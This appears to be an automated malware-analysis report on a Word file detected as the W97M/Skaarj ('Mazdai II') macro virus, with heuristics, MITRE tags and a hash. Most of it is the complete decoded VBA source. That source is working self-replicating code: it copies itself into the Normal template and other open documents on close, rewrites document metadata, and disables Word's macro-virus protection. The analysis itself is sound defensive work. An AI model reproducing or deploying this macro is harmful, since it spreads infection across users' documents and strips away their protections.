Verdict: MALICIOUS
Risk Score: 240
MITRE ATT&CK: T1059.005 Visual Basic; T1553.005 Mark-of-the-Web Bypass
Malware Insights
The sample is identified as W97M/Skaarj by ClamAV, a known macro virus family. The VBA macro code explicitly attempts to replicate itself into other Word documents, as indicated by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic. The macro also displays various hardcoded messages to the user, suggesting a form of user interaction or distraction.
Heuristics (4)
- ClamAV: Doc.Trojan.Skaarj-1 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Skaarj-1
- VBA macros detected (medium; OLE_VBA_MACROS; 1 related finding): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical; OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script: C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
- OLE document has large unaccounted-for region (high; OLE_SLACK_ANOMALY): OLE file is 45,569 bytes but its declared streams total only 24,330 bytes — 21,239 bytes (47%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5027 bytes |

SHA-256: 968597552690d9d2c134ae6660a38454aa9e87b06a793f94b2ec5ceefa927e9a
Detection (ClamAV): Doc.Trojan.Skaarj-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Const MarkSign = "Mazdai II (Free-Harm Built) Version 2.2 © SKAARJ Y2K"
On Error GoTo handler
Dim WDoc As Word.Document, M As Object, C As Object, Infected As Boolean, Found As Boolean
Dim Saved As Boolean, Mon As String, Phrase As Byte, t As Long, i As Long, N As Boolean, Process As Byte
Set M = Nothing
N = False
Process = 0
Mon = GetSetting("Visdata", "Engines", "sizeX")
If Mon = "" Then
SaveSetting "Visdata", "Engines", "sizeX", Month(Now)
ElseIf Mon - Month(Now) <> 0 Then
If Rnd * 20 < 1 Then
Do
Phrase = Int(12 * Rnd)
Loop While Phrase > 11
Select Case Phrase
Case 0: MsgBox "Nowhere to run, nowhere to hide ", vbExclamation, "Mazdai II"
Case 1: MsgBox "Life is short - boost yourself", vbExclamation, "Mazdai II"
Case 3: MsgBox "It's nice to be important, but it's more important to be nice ;-)" & vbCrLf & "Scooter", vbExclamation, "Mazdai II"
Case 4: MsgBox "I have no mouth and I must scream", vbExclamation, "Mazdai II"
Case 5: MsgBox "Death is not punishment - it is disposal", vbExclamation, "Mazdai II"
Case 6: MsgBox "Trust no one", vbExclamation, "Mazdai II"
Case 7: MsgBox "Forget the past - work for the future", vbExclamation, "Mazdai II"
Case 8: MsgBox "Time is NOW!", vbExclamation, "Mazdai II"
Case 9: MsgBox "SMILE! :~)", vbExclamation, "Mazdai II"
Case 10: MsgBox "Touch the SKY!", vbExclamation, "Mazdai II"
Case 11: MsgBox "The truth is out there", vbExclamation, "Mazdai II"
End Select
End If
End If
Found = False
For Each C In NormalTemplate.VBProject.VBComponents
If C.Type = 100 Then
If C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then
Found = True
Set M = C.CodeModule
End If
End If
Next
Do
For Each WDoc In Word.Documents
If WDoc.SaveFormat = wdFormatDocument Or WDoc.SaveFormat = wdFormatTemplate Then
For Each C In WDoc.VBProject.VBComponents
If C.Type = 100 Then
If C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then
Set M = C.CodeModule
Found = True
ElseIf Found Then
Saved = WDoc.Saved
On Error GoTo handler
t = C.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
out:
C.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc))
With Dialogs(wdDialogFileSummaryInfo)
.Title = "Surprise!!!"
.Author = "SKAARJ"
.Comments = "This is a second virus of SKAARJ from RUSSIA. This virus will not harm your system - it's only a test"
.Keywords = "SKAARJ, Virii, HTP, Experiment, Mazdai II"
End With
If Saved Then WDoc.Save
Infected = True
End If
End If
Next
End If
Next
Process = Process + 1
If Process = 3 Then Exit Do
Loop Until Infected
If Found Then
For Each C In NormalTemplate.VBProject.VBComponents
If C.Type = 100 Then
If Not C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then
Saved = NormalTemplate.Saved
N = True
t = C.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
out1:
C.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc))
If Saved Then NormalTemplate.Save
End If
End If
Next
End If
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Exit Sub
handler:
t = 1
If N = False Then
Resume out
Else
Resume out1
End If
End Sub